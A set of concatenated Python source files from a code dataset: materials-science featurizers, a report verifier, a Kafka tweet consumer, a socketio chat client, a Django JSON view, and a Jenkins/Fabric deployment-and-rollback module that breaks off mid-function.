(PRDF) of an xtal structure\n\n The PRDF of a crystal structure is the radial distibution function broken\n down for each pair of atom types. The PRDF was proposed as a structural\n descriptor by [Schutt *et al.*]\n (https://journals.aps.org/prb/abstract/10.1103/PhysRevB.89.205118)\n\n Args:\n cutoff: (float) distance up to which to calculate the RDF.\n bin_size: (float) size of each bin of the (discrete) RDF.\n include_elems: (list of string), list of elements that must be included in PRDF\n exclude_elems: (list of string), list of elmeents that should not be included in PRDF\n\n Features:\n Each feature corresponds to the density of number of bonds\n for a certain pair of elements at a certain range of\n distances. For example, \"Al-Al PRDF r=1.00-1.50\" corresponds\n to the density of Al-Al bonds between 1 and 1.5 distance units\n By default, this featurizer generates RDFs for each pair\n of elements in the training set.\"\"\"\n\n def __init__(self, cutoff=20.0, bin_size=0.1, include_elems=(),\n exclude_elems=()):\n self.cutoff = cutoff\n self.bin_size = bin_size\n self.elements_ = None\n self.include_elems = list(\n include_elems) # Makes sure the element lists are ordered\n self.exclude_elems = list(exclude_elems)\n\n def fit(self, X, y=None):\n \"\"\"Define the list of elements to be included in the PRDF. By default,\n the PRDF will include all of the elements in `X`\n\n Args:\n X: (numpy array nx1) structures used in the training set. Each entry\n must be Pymatgen Structure objects.\n y: *Not used*\n fit_kwargs: *not used*\n\n Returns:\n self\n \"\"\"\n\n # Initialize list with included elements\n elements = set([Element(e) for e in self.include_elems])\n\n # Get all of elements that appaer\n for strc in X:\n elements.update([e.element if isinstance(e, Specie) else e for e in\n strc.composition.keys()])\n\n # Remove the elements excluded by the user\n elements.difference_update([Element(e) for e in self.exclude_elems])\n\n # Store the elements\n self.elements_ = [e.symbol for e in sorted(elements)]\n\n return self\n\n def featurize(self, s):\n \"\"\"\n Get PRDF of the input structure.\n Args:\n s: Pymatgen Structure object.\n\n Returns:\n prdf, dist: (tuple of arrays) the first element is a\n dictionary where keys are tuples of element\n names and values are PRDFs.\n \"\"\"\n\n if not s.is_ordered:\n raise ValueError(\"Disordered structure support not built yet\")\n if self.elements_ is None:\n raise Exception(\"You must run 'fit' first!\")\n\n dist_bins, prdf = self.compute_prdf(\n s) # Assemble the PRDF for each pair\n\n # Convert the PRDF into a feature array\n zeros = np.zeros_like(dist_bins) # Zeros if elements don't appear\n output = []\n for key in itertools.combinations_with_replacement(self.elements_, 2):\n output.append(prdf.get(key, zeros))\n\n # Stack them together\n return np.hstack(output)\n\n def compute_prdf(self, s):\n \"\"\"Compute the PRDF for a structure\n\n Args:\n s: (Structure), structure to be evaluated\n Returns:\n dist_bins - float, start of each of the bins\n prdf - dict, where the keys is a pair of elements (strings),\n and the value is the radial distribution function for\n those paris of elements\n \"\"\"\n # Get the composition of the array\n composition = s.composition.fractional_composition.to_reduced_dict\n\n # Get the distances between all atoms\n neighbors_lst = s.get_all_neighbors(self.cutoff)\n\n # Sort neighbors by type\n distances_by_type = {}\n for p in itertools.product(composition.keys(), composition.keys()):\n distances_by_type[p] = []\n\n def get_symbol(site):\n if isinstance(site.specie, Element):\n return site.specie.symbol\n else:\n return site.specie.element.symbol\n\n # Each list is a list for each site\n for site, nlst in zip(s.sites, neighbors_lst):\n my_elem = get_symbol(site)\n\n for neighbor in nlst:\n rij = neighbor[1]\n n_elem = get_symbol(neighbor[0])\n # LW 3May17: Any better ideas than appending each element at a time?\n distances_by_type[(my_elem, n_elem)].append(rij)\n\n # Compute and normalize the prdfs\n prdf = {}\n dist_bins = self._make_bins()\n shell_volume = 4.0 / 3.0 * math.pi * (\n np.power(dist_bins[1:], 3) - np.power(dist_bins[:-1], 3))\n for key, distances in distances_by_type.items():\n # Compute histogram of distances\n dist_hist, dist_bins = np.histogram(distances, bins=dist_bins,\n density=False)\n # Normalize\n n_alpha = composition[key[0]] * s.num_sites\n rdf = dist_hist / shell_volume / n_alpha\n\n prdf[key] = rdf\n\n return dist_bins[:-1], prdf\n\n def _make_bins(self):\n \"\"\"Generate the edges of the bins for the PRDF\n\n Returns:\n [list of float], edges of the bins\n \"\"\"\n return np.arange(0, self.cutoff + self.bin_size, self.bin_size)\n\n def feature_labels(self):\n if self.elements_ is None:\n raise Exception(\"You must run 'fit' first!\")\n bin_edges = self._make_bins()\n labels = []\n for e1, e2 in itertools.combinations_with_replacement(self.elements_,\n 2):\n for r_start, r_end in zip(bin_edges, bin_edges[1:]):\n labels.append(\"{}-{} PRDF r={:.2f}-{:.2f}\".format(\n e1, e2, r_start, r_end\n ))\n return labels\n\n def citations(self):\n return [\"@article{Schutt2014,\"\n \"author = {Sch{\\\"{u}}tt, K. T. and Glawe, H. and Brockherde, F. \"\n \"and Sanna, A. and M{\\\"{u}}ller, K. R. and Gross, E. K. U.},\"\n \"doi = {10.1103/PhysRevB.89.205118},\"\n \"journal = {Physical Review B},\"\n \"month = {may},number = {20},pages = {205118},\"\n \"title = {{How to represent crystal structures for machine learning:\"\n \" Towards fast prediction of electronic properties}},\"\n \"url = {http://link.aps.org/doi/10.1103/PhysRevB.89.205118},\"\n \"volume = {89},\"\"year = {2014}}\"]\n\n def implementors(self):\n return [\"Logan Ward\", \"Saurabh Bajaj\"]\n\n\nclass ElectronicRadialDistributionFunction(BaseFeaturizer):\n \"\"\"\n Calculate the inherent electronic radial distribution function (ReDF)\n\n The ReDF is defined according to Willighagen et al., Acta Cryst., 2005, B61,\n 29-36.\n\n The ReDF is a structure-integral RDF (i.e., summed over\n all sites) in which the positions of neighboring sites\n are weighted by electrostatic interactions inferred\n from atomic partial charges. Atomic charges are obtained\n from the ValenceIonicRadiusEvaluator class.\n\n Args:\n cutoff: (float) distance up to which the ReDF is to be\n calculated (default: longest diagaonal in\n primitive cell).\n dr: (float) width of bins (\"x\"-axis) of ReDF (default: 0.05 A).\n \"\"\"\n\n def __init__(self, cutoff=None, dr=0.05):\n self.cutoff = cutoff\n self.dr = dr\n\n def featurize(self, s):\n \"\"\"\n Get ReDF of input structure.\n\n Args:\n s: input Structure object.\n\n Returns: (dict) a copy of the electronic radial distribution\n functions (ReDF) as a dictionary. The distance list\n (\"x\"-axis values of ReDF) can be accessed via key\n 'distances'; the ReDF itself is accessible via key\n 'redf'.\n \"\"\"\n if self.dr <= 0:\n raise ValueError(\"width of bins for ReDF must be >0\")\n\n # Make structure primitive.\n struct = SpacegroupAnalyzer(s).find_primitive() or s\n\n # Add oxidation states.\n struct = ValenceIonicRadiusEvaluator(struct).structure\n\n if self.cutoff is None:\n # Set cutoff to longest diagonal.\n a = struct.lattice.matrix[0]\n b = struct.lattice.matrix[1]\n c = struct.lattice.matrix[2]\n self.cutoff = max(\n [np.linalg.norm(a + b + c), np.linalg.norm(-a + b + c),\n np.linalg.norm(a - b + c), np.linalg.norm(a + b - c)])\n\n nbins = int(self.cutoff / self.dr) + 1\n redf_dict = {\"distances\": np.array(\n [(i + 0.5) * self.dr for i in range(nbins)]),\n \"distribution\": np.zeros(nbins, dtype=np.float)}\n\n for site in struct.sites:\n this_charge = float(site.specie.oxi_state)\n neighbors = struct.get_neighbors(site, self.cutoff)\n for nnsite, dist, *_ in neighbors:\n neigh_charge = float(nnsite.specie.oxi_state)\n bin_index = int(dist / self.dr)\n redf_dict[\"distribution\"][bin_index] \\\n += (this_charge * neigh_charge) / (struct.num_sites * dist)\n\n return [redf_dict]\n\n def feature_labels(self):\n return [\"electronic radial distribution function\"]\n\n def citations(self):\n return [\"@article{title={Method for the computational comparison\"\n \" of crystal structures}, volume={B61}, pages={29-36},\"\n \" DOI={10.1107/S0108768104028344},\"\n \" journal={Acta Crystallographica Section B},\"\n \" author={Willighagen, E. L. and Wehrens, R. and Verwer,\"\n \" P. and de Gelder R. and Buydens, L. M. C.}, year={2005}}\"]\n\n def implementors(self):\n return [\"Nils E. R. Zimmermann\"]\n\n\nclass XRDPowderPattern(BaseFeaturizer):\n \"\"\"\n 1D array representing powder diffraction of a structure as calculated by\n pymatgen. The powder is smeared / normalized according to gaussian_kde.\n\n NOTE comprhys: placed in distribution as the rdf and ssf are related by\n a fourier transform.\n \"\"\"\n\n def __init__(self, two_theta_range=(0, 127), bw_method=0.05,\n pattern_length=None, **kwargs):\n \"\"\"\n Initialize the featurizer.\n\n Args:\n two_theta_range ([float of length 2]): Tuple for range of\n two_thetas to calculate in degrees. Defaults to (0, 90). Set to\n None if you want all diffracted beams within the limiting\n sphere of radius 2 / wavelength.\n bw_method (float): how much to smear the XRD pattern\n pattern_length (float): length of final array; defaults to one value\n per degree (i.e. two_theta_range + 1)\n **kwargs: any other arguments to pass into pymatgen's XRDCalculator,\n such as the type of radiation.\n \"\"\"\n self.two_theta_range = two_theta_range\n self.bw_method = bw_method\n self.pattern_length = pattern_length or two_theta_range[1] - \\\n two_theta_range[0] + 1\n self.xrd_calc = XRDCalculator(**kwargs)\n\n def featurize(self, strc):\n pattern = self.xrd_calc.get_pattern(\n strc, two_theta_range=self.two_theta_range)\n x, y = pattern.x, pattern.y\n hist = []\n for x1, y1 in zip(x, y):\n num = int(y1)\n hist += [x1] * num\n\n kernel = gaussian_kde(hist, bw_method=self.bw_method)\n x = np.linspace(self.two_theta_range[0], self.two_theta_range[1],\n self.pattern_length)\n y = kernel(x)\n\n return y\n\n def feature_labels(self):\n return ['xrd_{}'.format(x) for x in range(self.pattern_length)]\n\n def citations(self):\n return [\"@article{Ong2013, author = {Ong, Shyue Ping and Richards, \"\n \"William Davidson and Jain, Anubhav and Hautier, \"\n \"Geoffroy and Kocher, Michael and Cholia, Shreyas and Gunter, \"\n \"Dan and Chevrier, Vincent L. and Persson, \"\n \"Kristin A. and Ceder, Gerbrand}, \"\n \"doi = {10.1016/j.commatsci.2012.10.028}, issn = {09270256}, \"\n \"journal = {Computational Materials Science}, month = {feb}, \"\n \"pages = {314--319}, \"\n \"publisher = {Elsevier B.V.}, title = {{Python Materials \"\n \"Genomics (pymatgen): A robust, open-source python \"\n \"library for materials analysis}}, url = \"\n \"{http://linkinghub.elsevier.com/retrieve/pii/S0927025612006295}, \"\n \"volume = {68}, year = {2013} } \"]\n\n def implementors(self):\n return ['Anubhav Jain', 'Matthew Horton']\n","sub_path":"matminer/featurizers/structure/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":15556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581096662","text":"from __future__ import annotations\n\nimport re\nimport tasks\nimport pandas as pd\n\nfrom error import VerificationError\nfrom fabrica import Verifier\nfrom data_layer import SQLQuery\nfrom io import StringIO\nfrom abc import abstractmethod\nfrom typing import TypeVar, Generic, Optional, Dict, List\n\nclass Verification:\n \"\"\"A verification of one comparison between two data sets that should match.\"\"\"\n\n class VerificationResult:\n \"\"\"A descriptive result of comparing two data sets\"\"\"\n identifier: str\n description: str\n success: bool\n required: bool\n\n def __init__(self, identifier: str, success: bool, required: bool, description: str):\n self.identifier = identifier\n self.success = success\n self.required = required\n self.description = description\n\n identifier: str\n task_pattern: Optional[re.Pattern]\n required: bool\n verify: Dict[str, any]\n before: bool\n after: bool\n\n def __init__(self, identifier: str, configuration: Dict[str, any]):\n self.identifier = identifier\n self.task_pattern = re.compile(configuration['task_pattern']) if 'task_pattern' in configuration else None\n self.required = configuration['required'] if 'required' in configuration else True\n self.verify = configuration['verify']\n self.before = configuration['before'] if 'before' in configuration else False\n self.after = configuration['after'] if 'after' in configuration else False\n\n def result_description(self, result: Verifier.Verification) -> str:\n return f'''files: {\" \".join([\n result.json_path_a,\n result.json_path_b,\n result.csv_path_a,\n result.csv_path_b\n ])}'''\n\n def matches_task_type(self, task_type: str) -> bool:\n return self.task_pattern is None or self.task_pattern.match(task_type) is not None\n\n def verify_task(self, task: tasks.ReportTask) -> Verification.VerificationResult:\n verifier = Verifier(database=task.sql_layer.connection_options.database)\n result = verifier.verify(**self.verify)\n return Verification.VerificationResult(\n identifier=self.identifier,\n success=result.success,\n required=self.required,\n description=self.result_description(result=result)\n )\n\nT = TypeVar(tasks.ReportTask)\n\"\"\"Generic ReportTask\"\"\"\n\nclass ReportVerifier(Generic[T]):\n \"\"\"An abstract base verifier for performing a set of verifications.\"\"\"\n task: T\n\n def __init__(self, task: 'T'):\n self.task = task\n\n @abstractmethod\n def verify(self):\n pass\n\nclass BaseReportVerifier(ReportVerifier):\n \"\"\"A concrete base verifier that performs all verifications matching a task type.\"\"\"\n @property\n def verifications(self) -> List[Verification]:\n return list(filter(lambda v: v.matches_task_type(self.task.task_type.value), [\n Verification(\n identifier=k,\n configuration=v\n )\n for k, v in sorted(self.task.verifications.items(), key=lambda t: t[0])\n ]))\n\n def verify(self):\n verifications = self.verifications\n if not verifications:\n return\n results = [\n v.verify_task(task=self.task)\n for v in verifications\n ]\n error_descriptions = [\n f'{r.identifier} ({r.description})' for r in results if not r.success and r.required\n ]\n if error_descriptions:\n raise VerificationError(verifications=error_descriptions)\n newline = '\\n'\n return f'{len(list(filter(lambda r: r.success, results)))} / {len(results)} verification{\"s\" if len(results) != 1 else \"\"} passed:\\n{newline.join(\"Verification \" + (\"succeeded\" if r.success else \"FAILED\") + f\" ——> {r.identifier}\" + (\" (required)\" if r.required else \"\") + (f\" {r.description}\" if r.description else \"\") for r in results)}'\n\nclass BeforeReportVerifier(BaseReportVerifier):\n \"\"\"A concrete verifier that performs all verifications that should occur before main task execution.\"\"\"\n @property\n def verifications(self) -> List[Verification]:\n return list(filter(lambda v: v.before, super().verifications))\n\nclass AfterReportVerifier(BaseReportVerifier):\n \"\"\"A concrete verifier that performs all verifications that should occur after main task execution.\"\"\"\n @property\n def verifications(self) -> List[Verification]:\n print('verifications')\n return [\n *([RowCountVerification(\n task=self.task,\n required=True,\n allow_empty=True\n )] if self.task.run_date is not None and self.task.row_count is not None else []),\n *filter(lambda v: v.after, super().verifications),\n ]\n\nclass VoidReportVerifier(ReportVerifier):\n \"\"\"A concrete verifier that performs no verifications at all.\"\"\"\n def verify(self):\n pass\n\nclass RowCountVerification(Verification):\n \"\"\"A verification that the task's row count matches the number of rows in its table with a fetch_date value of the task's run_date.\"\"\"\n task: tasks.ReportTask\n allow_empty: bool\n\n def __init__(self, task: tasks.ReportTask, required: bool=True, allow_empty: bool=True):\n self.task = task\n self.allow_empty = allow_empty\n inserted_row_count_query = SQLQuery(\n query=f'''\nselect count(*) as row_count \nfrom {self.task.report_table_model.full_table_name}\nwhere fetch_date = %s;\n ''',\n substitution_parameters=(SQLQuery.format_time(self.task.run_date),)\n )\n report_row_count_stream = StringIO()\n pd.DataFrame([{\n 'row_count': self.task.row_count if self.task.row_count is not None else 0,\n }]).to_csv(report_row_count_stream, index=False)\n report_row_count_stream.seek(0)\n super().__init__(\n identifier='row_count',\n configuration={\n 'required': required,\n 'after': True,\n 'verify': {\n 'name_a': 'inserted_row_count',\n 'text_a': inserted_row_count_query.substituted_query,\n 'name_b': 'report_row_count',\n 'stream_b': report_row_count_stream,\n 'csv_b': True,\n }\n }\n )\n\n def result_description(self, result: Verifier.Verification) -> str:\n return f'{self.task.row_count} report rows. {super().result_description(result=result)}'\n\n def verify_task(self, task: tasks.ReportTask) -> Verification.VerificationResult:\n assert task is self.task\n if task.row_count is None:\n return Verification.VerificationResult(\n identifier=self.identifier,\n success=self.allow_empty,\n required=self.required,\n description='No report rows.'\n )\n return super().verify_task(task=task)\n","sub_path":"verifying/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"594146128","text":"#!/usr/bin/python3\n\nfrom kafka.consumer import SimpleConsumer\nfrom kafka import SimpleClient\nimport argparse\nimport os\nimport json\n\nif __name__ == '__main__':\n # creating an argument parser to define where to get the messages from and where to dump them\n argument_parser = argparse.ArgumentParser()\n argument_parser.add_argument('--topic', type=str, default='trump')\n argument_parser.add_argument('--hosts', type=str, default='localhost:9092')\n argument_parser.add_argument('--path', type=str, default='./tweets')\n\n arguments = argument_parser.parse_args()\n\n # getting the topic to collect the messages from\n topic_to_collect_from = arguments.topic\n # getting the hosts of the brokers\n kafka_hosts = arguments.hosts\n # getting the path to the file where we will dump the content of topic\n path_to_sink_folder = arguments.path\n\n # creating the folder if it does not exist\n try:\n os.stat(path_to_sink_folder)\n except FileNotFoundError:\n os.mkdir(path_to_sink_folder)\n\n # instantiating a Kafka client\n kafka_client = SimpleClient(hosts=kafka_hosts)\n\n # instantiating a Kafka consumer\n kafka_consumer = SimpleConsumer(client=kafka_client, topic=topic_to_collect_from, group='simple_consumer_group')\n\n # looping over the values\n fetch_tweets = True\n counter = 0\n while fetch_tweets:\n messages = kafka_consumer.get_messages(count=1)\n counter += 1\n if len(messages) == 0:\n fetch_tweets = False\n else:\n file_name = 'tweet_n_{}.json'.format(counter+1)\n message = json.loads(messages[0].message.value)\n with open(os.path.join(path_to_sink_folder, file_name), 'w', encoding='utf-8') as json_file:\n json.dump(message, json_file)\n","sub_path":"solutions/kafka_consumer_twitter.py","file_name":"kafka_consumer_twitter.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358774039","text":"import asyncio\nimport socketio\nimport sys\nimport os\nimport argparse\nfrom colorama import init, Fore, Style\nfrom time import sleep\nfrom threading import Thread\nfrom multiprocessing import Process\n\nSYSTEM = os.name\n\n# Colorama module init\ninit()\n\nPARSER = argparse.ArgumentParser(description=\"Simple terminal chat client\")\nPARSER.add_argument(\n \"host\",\n type=str,\n nargs=\"?\",\n help=\"Address of host, default: localhost:5000\",\n default=\"localhost:5000\",\n)\n\nSIO = socketio.AsyncClient()\nLOOP = asyncio.get_event_loop()\nUSERNAME = None\n\n\n# * Sync functions\n\n\ndef reset_styles() -> None:\n print(Style.RESET_ALL, end=\"\")\n\n\ndef danger_style() -> str:\n return f\"{Style.BRIGHT}{Fore.RED}\"\n\n\ndef user_input_style() -> str:\n return f\"{Style.BRIGHT}{Fore.GREEN}\"\n\n\ndef exit_application() -> None:\n LOOP.call_soon_threadsafe(LOOP.stop)\n os._exit(0)\n\n\ndef clear_screen() -> None:\n os.system(\"cls\" if SYSTEM == \"nt\" else \"clear\")\n\n\ndef trying_message() -> None:\n temp = \"Trying to connect\"\n count = 0\n while True:\n print(temp + \".\" * count, end=\"\\r\")\n count += 1\n sleep(0.1)\n\n\ndef print_reset(text: str, end=\"\\n\") -> None:\n \"\"\"print implementation with Style.RESET_ALL\"\"\"\n print(f\"{text}{Style.RESET_ALL}\", end=end)\n\n\ndef show_user_input(username: str) -> None:\n print_reset(f\"{user_input_style()}{username}: \", end=\"\")\n\ndef set_user_username(*args) -> None:\n if args:\n global USERNAME\n USERNAME = args[0]\n else:\n print_reset(f'{danger_style()}Username already taken')\n\n\n# * Async functions\n\n\n@SIO.event\nasync def connect():\n # Stop displaying tryin to connect message\n trying_message_process.terminate()\n clear_screen()\n print_reset(f\"{Fore.GREEN}Connected!\")\n\n\n@SIO.event\nasync def connect_error():\n # Stop displaying tryin to connect message\n trying_message_process.terminate()\n print_reset(f\"{danger_style()} The connection failed!\")\n\n\n@SIO.event\nasync def disconnect():\n print_reset(f\"{danger_style()} Disconnected!\")\n\n\n@SIO.event\nasync def message(data) -> None:\n reset_styles()\n print(f\"\\r{Style.BRIGHT}{Fore.CYAN}{data.get('username')}: {Style.RESET_ALL}{data.get('message')}\")\n show_user_input(USERNAME)\n\nasync def send_message(message: str) -> None:\n await SIO.emit(\"message\", message)\n\nasync def is_username_avaiable(username: str) -> None:\n await SIO.emit('is_username_avaiable', username, callback=set_user_username)\n\n\nasync def connect_to_server(host: str):\n try:\n await SIO.connect(f'http://{host}')\n except socketio.exceptions.ConnectionError:\n # Stop displaying tryin to connect message\n trying_message_process.terminate()\n print_reset(f\"{danger_style()}\\nDisconnecting... [ConnectionError]\")\n exit_application()\n\n try:\n await SIO.wait()\n except AttributeError:\n print_reset(f\"{danger_style()}\\nDisconnecting... [ServerWasClosedUnexpected]\")\n exit_application()\n\n\nif __name__ == \"__main__\":\n args = PARSER.parse_args()\n trying_message_process = Process(target=trying_message)\n trying_message_process.start()\n # Connect to server on separate thread, so user can use terminal\n t = Thread(target=lambda: LOOP.run_until_complete(connect_to_server(args.host)))\n t.start()\n # Get username\n try:\n while True:\n sleep(0.1)\n if not trying_message_process.is_alive():\n if not USERNAME:\n show_user_input('Pick Your username')\n new_username = input()\n if new_username:\n asyncio.run_coroutine_threadsafe(is_username_avaiable(new_username), LOOP)\n else:\n # ANSI Escape\n print('\\033[A', end='')\n else:\n clear_screen()\n break\n # Main loop\n while True:\n # Show user input after screen is clear and connected message shown\n sleep(0.1)\n show_user_input(USERNAME)\n user_message = input()\n if user_message:\n asyncio.run_coroutine_threadsafe(send_message(user_message), LOOP)\n else:\n # ANSI Escape\n print('\\033[A', end='')\n except KeyboardInterrupt:\n print_reset(f\"{danger_style()}\\nDisconnecting...\")\n exit_application()","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182313744","text":"# Create your views here.\n# from django.core import serializers\nfrom django.core.serializers.json import Serializer\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom maps.models import Article\n\n\nclass ShortSerializer(Serializer):\n def get_dump_object(self, obj):\n return self._current\n\n def end_serialization(self):\n for i, ob in enumerate(self.objects):\n self.objects[i] = {\n k: v for k, v in ob.get('fields', {}).items()}\n return super(ShortSerializer, self).end_serialization()\n\n\ndef articles(request):\n try:\n articles = Article.objects.filter(enable=True)\n except Article.DoesNotExist:\n return HttpResponseNotFound(mimetype='application/json; charset=utf8')\n\n s = ShortSerializer()\n output = s.serialize(\n articles,\n fields=(\n 'lat', 'lng', 'interest',\n 'title', 'place', 'url'),\n ensure_ascii=False,\n )\n return HttpResponse(output, mimetype='application/json; charset=utf8')\n","sub_path":"maps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"349238725","text":"# -*- coding: utf-8 -*-\n# @Time : 17-8-17 上午9:14\n# @Author : Wang Chao\n\nimport os\nimport threading\nfrom .models import Deploys\nimport fnmatch\nfrom django.conf import settings\nfrom utils.fabfile import Fabapi\nfrom utils.jenkinsjob import JenkinsJob\nimport base64\nimport time\nimport traceback\n\n\n\ndef deploy_thread(project_id, deploy_id, deploys):\n deploy = Deploys.objects.filter(id=deploy_id).get()\n\n jenkinsip = settings.JENKINSIP\n jenkinsjob = deploy.project.jenkins_name\n jenkinsworkspace = os.path.join(settings.JENKINSBASEPATH, '{0}.{1}'.format(deploy.branch, jenkinsjob))\n\n localws = os.path.join(deploy.project.local_dir, 'qa/')\n\n if deploy.status != 3:\n return\n try:\n deploys.update(deploy, progress=0, status=2)\n\n # =======before checkout========\n cmd = \"mkdir -p {local_dir} && cd {local_dir} && rm -rf {local_dir}/*.war {local_dir}/*.jar\".format(\n local_dir=localws)\n f = Fabapi(hostip=jenkinsip)\n f.remoted(cmd)\n deploys.update(deploy, progress=5, status=2)\n deploys.append_comment(deploy, \"Jenkins 任务:\\n--任务名称:{0},git分支:{1}\\n\".format(jenkinsjob, deploy.branch))\n\n # ======== Jenkins ========\n if deploy.jenkinsbd.strip() == 'yes':\n deploys.append_comment(deploy, \"--拉取代码并编译打包(by git and maven)\\n\")\n jenkins = JenkinsJob(username=settings.JENKINSUSER, password=base64.b64decode(settings.JENKINSPASS),\n jobname='{0}.{1}'.format(deploy.branch, jenkinsjob))\n j = jenkins.jobbuild()\n result = j['result']\n num = int(j['num'])\n if not result == 'SUCCESS':\n deploys.append_comment(deploy, \"--Jenkins 构建失败\\n\\n\")\n raise Exception(\"Jenkins\")\n else:\n deploys.append_comment(deploy,\n \"--Jenkins 构建成功\\n\"\n \"--任务日志请访问:/deploy/code/jenkins/?jobname={0}.{1}&&num={2}\\n\\n\".format(\n deploy.branch, jenkinsjob, num))\n else:\n deploys.append_comment(deploy, \"--Jenkins 任务本次不执行构建\\n\\n\")\n deploys.update(deploy, progress=15, status=2)\n\n deploys.append_comment(deploy, \"开始部署:\\n\")\n # ========= checkouting ==========\n deploys.append_comment(deploy, \"检出应用程序包。。。\\n\")\n time.sleep(1)\n\n # ========= copy wars to local ============\n for warnames in deploy.warnames.strip().split(','):\n cmd = \"find {jenkinsworkspace} -iname {warnames} | xargs ls -lta | awk '{{print $NF}}' | head -n 1\".format(\n jenkinsworkspace=jenkinsworkspace,\n warnames=warnames)\n\n warpath = f.remoted(cmd)\n print(warpath)\n time.sleep(1)\n f.getfile(local_dest=localws, remote_dest=warpath)\n # execute(jenkinsfab.getfile, local_dest=localws, remote_dest=warpath)\n deploys.append_comment(deploy, \"程序包下载完成\\n\".format(warnames))\n\n deploys.update(deploy, progress=45, status=2)\n\n # =========== before deploy =================\n hostfab = Fabapi(hostip=deploy.host.public_ip)\n deploys.append_comment(deploy, \"准备部署 目标主机: {0}\\n\".format(deploy.host.public_ip))\n cmd = (\"mkdir -p {remote_history_dir} && chmod -R 777 {remote_history_dir}\".format(\n remote_history_dir=os.path.join(deploy.project.remote_history_dir,\n deploy.created_at.strftime('%Y%m%d-%H%M%S'))))\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n\n deploys.append_comment(deploy, \"--删除过期的历史备份\\n\")\n cmd = (\"WORKSPACE='{0}' && cd $WORKSPACE && ls -1t | tail -n +{1} | xargs rm -rf\".format(\n deploy.project.remote_history_dir, settings.MAX_DEPLOY_HISTORY))\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n before_deploy = deploy.project.before_deploy.replace(\"\\r\", \"\").replace(\"\\n\", \" && \")\n # ========== create dest dirs ===================\n\n cmd = (\"mkdir -p {destwar_dir} \".format(destwar_dir=deploy.project.destwar_dir))\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n if before_deploy:\n cmd = before_deploy\n hostfab.remoted(cmd)\n deploys.append_comment(deploy, \"暂停tomcat应用\\n--exec {0}\\n\".format(cmd))\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n\n deploys.update(deploy, progress=67, status=2)\n\n if deploy.project.destwar_dir.replace(\"\\r\", \"\").replace(\"\\n\", \"\"):\n for war_name in deploy.warnames.strip().split(','):\n app_name = war_name.split('.')[0]\n if app_name:\n try:\n cmd = (\n \"mv {destwar_dir}/{war_name} {remote_history_dir} ; rm -rf {destwar_dir}/{app_name} \".format(\n destwar_dir=deploy.project.destwar_dir,\n war_name=war_name,\n app_name=app_name,\n remote_history_dir=os.path.join(deploy.project.remote_history_dir,\n deploy.created_at.strftime('%Y%m%d-%H%M%S'))))\n\n deploys.append_comment(deploy, \"--执行本次备份\\n\")\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n deploys.append_comment(deploy, \"--部署新版本应用包\\n\")\n hostfab.putfile(local_dest=\"%s/%s\" % (localws, war_name),\n remote_dest=deploy.project.destwar_dir)\n # execute(hostfab.putfile, local_dest=\"%s/%s\" % (localws, war_name),\n # remote_dest=deploy.project.destwar_dir)\n except BaseException as e:\n print(e)\n else:\n raise Exception(\"project not exists\")\n\n deploys.append_comment(deploy, \"部署完成!\\n\")\n deploys.update(deploy, progress=83, status=2)\n\n # =============== after deploy =============\n deploys.append_comment(deploy, \"启动服务并将康检查\\n\")\n\n after_deploy = deploy.project.after_deploy.replace(\"\\r\", \"\").replace(\n \"\\n\", \" && \")\n if after_deploy:\n cmd = after_deploy\n deploys.append_comment(deploy, \"--exec {0}\\n\".format(cmd))\n f.remoted(cmd)\n time.sleep(10)\n deploys.append_comment(deploy, \"应用启动正常\\n\")\n deploys.append_comment(deploy, \"完成,结束!\\n\")\n\n except BaseException as err:\n traceback.print_exc()\n\n deploys.append_comment(deploy, repr(err))\n deploys.update(deploy, progress=100, status=0)\n else:\n deploys.update(deploy, progress=100, status=1)\n finally:\n\n deploy = deploys.first(id=deploy_id)\n if deploy:\n deploys.deploy(deploy)\n\n\ndef rollback_thread(project_id, deploy_id, deploys):\n deploy = Deploys.objects.filter(id=deploy_id).get()\n deploy.comment = ''\n deploy.save()\n if deploy.status != 1:\n deploys.append_comment(deploy, \"该次部署不成功,不能回滚\\n\")\n\n try:\n # before rollback\n deploys.append_comment(deploy, \"检查备份文件(at {0})\\n\".format(deploy.created_at.strftime('%Y%m%d-%H%M%S')))\n f = Fabapi(hostip=deploy.host.public_ip)\n apppath = os.path.join(deploy.project.remote_history_dir, deploy.created_at.strftime('%Y%m%d-%H%M%S'),\n deploy.warnames)\n cmd = '[ -f {0} ] && echo 0 || echo 1 | head -n 1'.format(apppath)\n\n res = f.remoted(cmd)\n\n if res != '0':\n deploys.append_comment(deploy, \"备份文件不存在,回滚终止\\n\")\n raise Exception(\"备份文件不存在,回滚终止\")\n\n deploys.append_comment(deploy, \"备份文件存在,回滚开始\\n\")\n deploys.update(deploy, progress=33, status=2)\n # rollback\n\n cmd = (\n \"rm -rf {destwar_dir}/{war_name} ; rm -rf {destwar_dir}/{app_name} \".format(\n destwar_dir=deploy.project.destwar_dir,\n war_name=deploy.warnames,\n app_name=deploy.warnames.split('.')[0]))\n\n f.remoted(cmd)\n deploys.append_comment(deploy, \"---清空旧数据\\n\")\n deploys.update(deploy, progress=67, status=2)\n\n cmd = (\n \"cp -rp {apppath} {destwar_dir}\".format(apppath=apppath, destwar_dir=deploy.project.destwar_dir)\n )\n f.remoted(cmd)\n deploys.append_comment(deploy, \"---恢复文件完成\\n\")\n\n # after rollback\n # =============== after deploy =============\n deploys.append_comment(deploy, \"启动服务并将康检查\\n\")\n after_deploy = 